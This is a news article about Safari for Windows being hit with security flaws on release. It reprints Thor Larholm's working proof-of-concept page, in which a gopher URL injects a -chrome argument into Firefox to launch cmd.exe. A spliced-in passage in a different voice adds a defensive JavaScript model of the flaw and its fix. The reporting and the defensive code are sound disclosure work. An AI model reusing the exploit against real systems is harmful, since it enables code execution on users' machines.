Rixstep

Holy Safari!

Apple's ultra secure web browser now ported to Windows perforated repeatedly within hours of release.

It's déjà vu all over again: as with the first-ever release of Safari for OS X, which hosed people's hard drives, the first-ever release for Windows is getting bad press because of a whole slew of endemic security vulnerabilities.

Aviv Raff, David Maynor, and Thor Larholm are all reporting serious security flaws in the browser.

'Given that Apple has had a lousy track record with security on OS X, in addition to a hostile attitude towards security researchers, a lot of people are expecting to see quite a number of vulnerabilities targeted towards this new Windows browser', writes Larholm on his blog, and then goes on to explain the workings of a zero-day he found after only two hours of poking around.

What Larholm found is an endemic bug, one inherent in how the browser hands off URLs to other programs: no fuzzing needed, for once. He has a test page up on his site, but you're advised not to go there unless you like that kind of fun. Instead you can read the page code below.

<html><body>
<!-- The double quote after larholm.com closes the URL argument Safari passes to the gopher handler; everything after it is parsed as further command-line arguments. -->
<iframe src='gopher://larholm.com" -chrome
"javascript:C=Components.classes;I=Components.interfaces;
file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);
file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)
+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'
+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');
process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);
process.init(file);process.run(true,{},0);alert(process)'></iframe>
</body></html>

The exploit works by bouncing from Safari through Firefox: Safari hands the 'gopher' URL to whatever application is registered for that protocol, in this case Firefox, without filtering it, so the double quote embedded in the URL closes Firefox's URL argument and the rest of the string is parsed as a further command-line argument, -chrome, carrying attacker-chosen JavaScript. Script run that way has chrome privileges, and here it uses the XPCOM nsILocalFile and nsIProcess components to launch C:\Windows\System32\cmd.exe, the NT command interpreter, with any arguments you choose to pass to the process.run method.
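The hand-off just described, as an added example that is not the page's code and not Larholm's, Apple's or Mozilla's: a small JavaScript model of a browser building an external protocol handler's command line. The handler template, the argument splitter and the attack URL are assumptions constructed for the demonstration. The naive builder reproduces the injection the page describes; the hardened builder shows the check that stops it, namely approving the scheme and percent-encoding every character outside the URL character set before substitution, so no literal double quote or space ever reaches the command line.

```javascript
// Added example, not Larholm's test page and not Apple's or Mozilla's code.
// It models the flaw described above: the browser substitutes an untrusted
// URL into the registered handler's command-line template, so a double quote
// in the URL ends the "%1" argument and everything after it is parsed as
// further arguments (here -chrome). The handler template, the argument
// splitter and the URLs are assumptions constructed for the demonstration.

// Hypothetical HKCR\gopher\shell\open\command value (assumed, not taken from a
// real registry): the handler receives the URL as the argument after -url.
const HANDLER_TEMPLATE =
  '"C:\\Program Files\\Mozilla Firefox\\firefox.exe" -url "%1"';

// Minimal Windows-style command-line splitter: only double quotes group
// tokens; backslash escaping is not modelled because it plays no part here.
function splitArgs(cmdline) {
  const args = [];
  let cur = '';
  let inQuote = false;
  let quoted = false; // token contained quotes, so keep it even when empty
  for (const ch of cmdline) {
    if (ch === '"') { inQuote = !inQuote; quoted = true; continue; }
    if (!inQuote && (ch === ' ' || ch === '\t')) {
      if (cur.length > 0 || quoted) { args.push(cur); cur = ''; quoted = false; }
      continue;
    }
    cur += ch;
  }
  if (cur.length > 0 || quoted) args.push(cur);
  return args;
}

// Vulnerable: plain string substitution, which is what the page describes
// Safari doing with the gopher: URL.
function buildCommandLineNaive(url) {
  return HANDLER_TEMPLATE.replace('%1', url);
}

// Hardened: accept only an explicitly approved scheme, then percent-encode
// every character outside the RFC 3986 URL character set before substitution.
// A valid URL never contains a literal '"' or whitespace, so nothing can close
// the %1 argument and smuggle in -chrome.
const URL_SAFE = /[A-Za-z0-9\-._~:\/?#\[\]@!$&'()*+,;=%]/;

function buildCommandLineHardened(url, allowedSchemes = ['gopher']) {
  const m = /^([A-Za-z][A-Za-z0-9+.\-]*):/.exec(url);
  if (!m || !allowedSchemes.includes(m[1].toLowerCase())) {
    throw new Error('scheme not approved for an external handler: ' + url);
  }
  const encoded = Array.from(url, ch => (URL_SAFE.test(ch) ? ch : encodeURIComponent(ch))).join('');
  return HANDLER_TEMPLATE.replace('%1', encoded);
}

// Argument vector the handler would actually see, for inspection.
function handlerArgv(builder, url) {
  return splitArgs(builder(url));
}

// Constructed attack URL in the shape of the one on this page, with the
// XPCOM payload replaced by a harmless alert.
const ATTACK_URL = 'gopher://larholm.com" -chrome "javascript:alert(1)';

console.log('naive   :', handlerArgv(buildCommandLineNaive, ATTACK_URL));
console.log('hardened:', handlerArgv(buildCommandLineHardened, ATTACK_URL));
```

Run it with node: the naive argv contains a separate -chrome token followed by the javascript: payload, while the hardened argv contains a single URL token in which the quote and spaces have become %22 and %20. The same check belongs on the receiving side as well; a handler that parses its own command line should never trust the launching browser to have done it.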

The bread's burning.

Aviv Raff is also out with an exploit. 'I've decided to take it for a test drive, and ran Hamachi. I wasn't surprised to get a nice crash a few minutes later', writes Raff, who doesn't think much of Apple's claims of their software being secure.

'This is just a beta version, but don't you hate those pathetic claims?'

Finally David Maynor's out with his fuzz saw, finding first a 'memory corruption', then a 'stack corruption', and later an additional four 'bugs'.

'These are popping out like hotcakes', writes Maynor.

Copyright © Rixstep. All rights reserved.